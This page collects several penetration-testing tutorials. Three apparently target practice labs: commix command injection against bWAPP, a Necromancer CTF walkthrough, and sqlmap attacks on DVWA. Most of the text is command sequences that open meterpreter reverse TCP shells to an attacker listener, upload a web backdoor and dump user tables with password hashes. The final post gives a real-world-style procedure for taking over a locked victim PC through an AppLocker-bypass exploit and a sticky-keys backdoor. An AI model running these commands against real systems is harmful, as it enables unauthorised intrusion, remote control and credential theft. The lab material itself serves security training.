Powershell Injection Attacks using Commix and Magic Unicorn

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

You need to install bWAPP lab in your XAMPP or WAMP server, for this you can visit the link web Pentest lab setup using bwapp here.

Our task is to get meterpreter shell through os command injection-Blind attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

My task is to bypass all three security level in bWAPP through os command injection.

Let start!!!!

Set the security level low, from list box choose your bug select os command injection-Blind now and click on hack.

Type your IP in the text field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to PING button.

Look at image you will find that I have got the details.

Open the terminal in kali Linux and type the commix command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command

 commix –url=”http://192.168.1.101:81/bWAPP/commandi_blind.php” –data=”target=target=192.168.1.101&form=submit” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2″

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Commix found the target seems injectable via blind injection techniques and will further ask for pseudo terminal.

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell

Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

 Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) >7

Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.

commix(reverse_tcp) >2

Above step will geneterate a shellcode  marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.

Once metasploit framework gets loaded and starts the payload handler; come back to your previous terminal and press enter. As it is mention in image.

Luckly!! We succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

Same task we going to perform with same process but with another type of vulnerability. Set the security level low, from list box choose your bug select os command injection now and click on hack.

Type your IP in the DNS lookup field and just after that start the burp suite and set manual proxy of browser. Click on proxy tag then click to inception is on button, come back to bWAPP and now click to Lookup.

Open the terminal in kali Linux and type the commix command.

 commix –url=”http://192.168.1.101:81/bWAPP/commandi.php” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7″ –data=”target=192.168.1.101&form=submit”

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell

Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

 Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) >7

Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.

commix(reverse_tcp) >2

Above step will geneterate a shellcode  marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.

Once metasploit framework gets loaded and starts the payload handler come; back to your previous terminal and press enter. As it is mention in image.

Luckly!!  Again we succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Necromancer VM (CTF Challenge)

The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition. There are 11 flags to collect on your way to solving the challenge. The end goal is simple…. Destroy the Necromancer!

 You can download necromancer from here let’s get going. Firstly, we run netdiscover

 Netdiscover

Our next step is nmap.

nmap -A -p- 192.168.0.110

The scan takes a bit time and gives us nothing. So, let’s try a UDP scan using nmap.

nmap -sU -T4 -p- 192.168.0.110

We get a UDP port 666 open. Lets try netcat on it.

 nc -nvu 192.168.0.110 666

No matter how many times we hit enter, we get the same reply- “You gasp for air! Time is running out!”

When we tried running the machine (necromancer), we had a message regarding the IP – “Renewal in 3600 seconds”. This seems to be related to the message on our terminal.

Let’s quickly run tcpdump.

 tcpdump host 192.168.0.110

We get to know about some gateway 4444. This can be another port on our target. Lets use netcat once again.

 nc -nvlp 4444

And we get a text dump in return. It has capital characters, small characters and numbers as well. This has to be a base64 encoded text. We decode it at www.asciitohex.com and get some sensible text.

Ok. We have our 1st flag. And a message to chant the flag’s string at UDP port 666. The flag1 text seems to be a md5 hash so we decrypt it at www.hashkiller.co.uk . It decrypts to “opensesame”. Let’s return to our port 666 using netcat and type in this string there.

 nc -nvu 192.168.0.110

opensesame

Another hint. Numeral 80 reminds us ofport 80 used for http. Let’s fire up the victim machine’s IP to our browser on port 80.

Nothing useful except an image. Let’s download it and try to analyse it using binwalk

 binwalk /root/Desktop/pileoffeathers.jpg

So we discover that the image is actually a zip archive. Let’s rename it.

mv /root/Desktop/pileoffeathers.jpg /root/Desktop/pileoffeathers.zip

Upon unzipping the file we get a txt file named feathers.txt which again contains a base64 text. We it and get our 3rd flag along with a clue /amagicbridgeappearsatthechasm. Seems like a directory decode.

Opening the directory in our browser, we are greeted by another web-page with seriously no clues this time. It only tells us that we need a magical item that could protect us from the necromancer’s spell. We google for “magic items wiki” and find some good stuff on the very first link. But what next?

We decide to make a custom dictionary with all the words on this wiki page. We will use cewl for this.

cewlhttps://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v

This makes a dictionary of magical items on our desktop. Let us try dirb to get our next clue.

dirb http://192.168.0.110/amagicbridgeappearsatthechasm -w /root/Desktop/magicitems.txt

We get another directory as” result. “talisman.

When we visit the url now using talisman, we are asked to download a binary file named talisman.

We download the file and change the permissions of talisman by running

chmod 777 /root/Desktop/talisman

 Thereafter we run the file by going to its location.

./talisman

No matter what we answer to the asked question –“Do you want to wear the talisman?”, the result is the same –“Nothing happens”. So lets try to debug the binary file.

gdb /root/Desktop/talisman

Get some info about the functions-

info functions

Create a break point at wearTalisman because after all we want to wear the talisman.

break wearTalisman

run

And then jump to chantToBreakSpell

 jump chantToBreakSpell

Yess. We succeeded in wearing the talisman. We get our 4th flag and a hint to chant the flag’s words at UDP port 31337.

 Now the words appear to be in md5 hash and upon decrypting it we get – “blackmagic” We now use netcat to connect to port 31337 and type in “blackmagic” there.

 nc -unv 192.168.0.110 31337

blackmagic

And we get another directory along with our 5th flag

We open the directory with our victim’s IP.

Another webpage with a hint to see the UDP port 161(used for snmp) and a close look reveals that the word “necromancer” just before the image is actually a link. Upon clicking it we get another file to download named “necromancer”. We download and unzip it. It contains a cap file named necromancer. upon analyzing this file with wireshark, we discover that 802.11 protocol is being used. This indicates that the file is a wireless data cap file so let’s try to crack the key using aircrack-ng with rockyou.txt as our dictionary.

 aircrack-ng /root/Desktop/necromancer.cap -w /usr/share/wordlists/rockyou.txt

This cracks the key as death2all. use it with port 161 i.e. snmp.

snmpwalk-c death2all -v 1 192.168.0.110

It says that the door is locked.

Let’s try to unlock it using snmpset.

snmpset -c death2allrw -v 1 192.168.0.110 iso.3.6.1.2.1.1.6.0 s Unlocked

When the string changes to “Unlocked”, we run our previous command once again

 snmpwalk -c death2all -v 1 192.168.0.110

Voila!! The door unlocks and we get another flag along with a clue i.e. TCP port 22 (used for ssh) . flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22. Another md5 hash that decrypts to “demonslayer”.

 We try to login to port 22 assuming “demonslayer” to be the password but fail.

ssh 192.168.0.110

demonslayer

This means that “demonslayer” should be the username for ssh. To crack the password, we will use metasploit along with rockyou.txt dictionary. Open a terminal for metasploit.

 Search ssh_login

Thereafter we run the following commands:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.110

set username demonslayer

set pass_file /usr/share/wordlists/rockyou.txt

run

We get password as 12345678 and a shell as well.

But neither ls nor dir seems to be working on this shell.

So, we login to ssh via terminal on host using demonslayer/12345678

ssh demonslayer@192.168.0.110

12345678

Using ls -la we discover that there lies a flag8.txt file in the directory. To read its contents we use

cat flag8.txt

We get another hint regarding udp port 777. This does not works on our pc. So let us try on the victim’s shell.

nc -u localhost 777

and hit enter twice.

 So the necromancer is now trying to play a game with us. upon googling for his question “Where do the Black Robes practice magic of the Greater Path?” We get the answer. its Kelewan.

Our 8th flag is here.flag8{55a6af2ca3fee9f2fef81d20743bda2c} and another question as well that asks, “Who did Johann Faust VIII make a deal with?” Google tells us the answer to this question is Mephistopheles.

flag9{713587e17e796209d1df4c9c2c2d2966}

 And we get the next flag and yet another question “Who is tricked into passing the Ninth Gate?” Google comes in handy again and tells us the answer once more. The next answer is Hedge.

And our next flag awaits us. flag10{8dc6486d2c63cafcdc6efbba2be98ee4} nothing more to be noticed here. But if I am not wrong, we did see this “small vile” thing somewhere earlier. Let’s head back by cntrl+c and try to look for it.

 We type in ls -la and yes it’s there “.smallvile” about which we just discovered in the description alongwith our 10th flag. Let’s open it using cat.

 cat .smallvile

Hope this opened up some gates cause we don’t see any clue here. Let’s try sudo.

sudo –l

Seems to be working. It shows us the location of our 11th flag and that the flag11.txt file is not protected by any sort of password. Let’s try to open it.

sudo /bin/cat /root/flag11.txt

Wohoo!! Mission Accomplished. The last flag has been captured.

Researcher and Author:Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. contact here.

 

SQL Injection Exploitation in DVWA (Bypass All Security)

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

www.owasp.org/index.php/SQL_Injection

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  

Turn on burp suite in kali Linux click on proxy in menu bar and go for intercept is on button. Come to back and click on submit button in browser. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Copy the complete detail of intercept; past on leafpad; save on desktop as 1.

Open terminal and type following command for SQL injection attack using Sqlmap.

sqlmap -r /root/Desktop/1 –dbs -D dvwa –dump all –os-shell

sqlmap is an open source penetration testing tool that self-regulates the process of detecting and exploiting SQL injection vulnerabilities and taking over of database servers. -r is used for recursions which will analysis your intercepted data from path/root/Desktop/1.

Things that to be notice is I have used –dbs in above command which fetched all database names as you can see in below image. Then it will ask to store hashes in temporary file type y and hit enter.

Now next it extracts table: user for database DVWA which I have mentioned in above command as –D dvwa.

 Grateful we have penetrated the user table successfully. Please have a look over fetched data you will find that it dumps login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Now this tool is going to use a web backdoor for command prompt where it will ask to choose language for backdoor

Type 4 and hit enter.

Afterwards it will ask to choose any options for location for writable directory.

Type 1 and hit enter.

You can see the backdoor has been successfully uploaded on destination folder. Type y for retrieved the command standard output. Now I am inside the os-shell which I have mentioned in above command as os-shell.

Os-shell> net users

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level Medium

From the list of vulnerability select SQL Injection for your attack. Select user ID: 2 from list. Set proxy turn on intercept tab in burp suite and come back to web browser for submit. 

Follow the same process save the selected detail fetched by intercept on the desktop as file: 2.

Now security level is increased so I was unable to get os-shell but successful received all detail of database by typing following command on terminal.

sqlmap -r /root/Desktop/2 –dbs -D dvwa –dump all

Again I have got all database names including dvwa. Now again type y for further process.

Table: user for database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

 This is very similar to the low level, however this time the attacker is inputting the value in a different manner. The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

Here you find different scenario when you will select SQL Injection don’t get panic follow the step carefully this level is as similar as low level security. For hint the developer told that he had redirect the submit user ID to another page through POST action.

Click on link here to change your ID which will redirect to new window type ID: 1 turn on intercept then comes back and clicks on submit.

Now compare the intercepted data of both levels high and low you will find that POST action is use in high security as well as GET action is used in low security level. Copy the complete data and make following change in it. For help please look at below images.

Past the copied data to a leafpad replace POST from GET and add /?id=1&Submit=Submit save your file:third on desktop.

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Here go with flow!!!

Same process as above and this time again I will try for os-shell.

sqlmap -r /root/Desktop/1 –dbs -D dvwa –dump all –os-shell

Again I have got all database names including dvwa. Now again type y for further process.

Table: user for database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Oops!! Fail to get os-shell but we have retrieve database of dvwa under high security.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)

Lets learn how to take Meterpreter session of a pc in a network which is switched on but is locked and has remote desktop feature enabled on it.

Let us assume that our victim’s pc already has utilman attack or sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys .

You donot need physical access to the victim’s pc for this attack.

First, run metasploit on your pc.

$msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Open another terminal to take the remote desktop session of the victim’s pc and enter the victim’s ip.

$rdesktop 192.168.0.103

You get the remote desktop of the victim’s pc.

Press the “shift” key 5 times to bring up the command prompt.

And returning to our previous terminal with meterpreter, we have finally got the session of victim’s pc on out terminal.

AuthorJitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

Related Posts Plugin for WordPress, Blogger...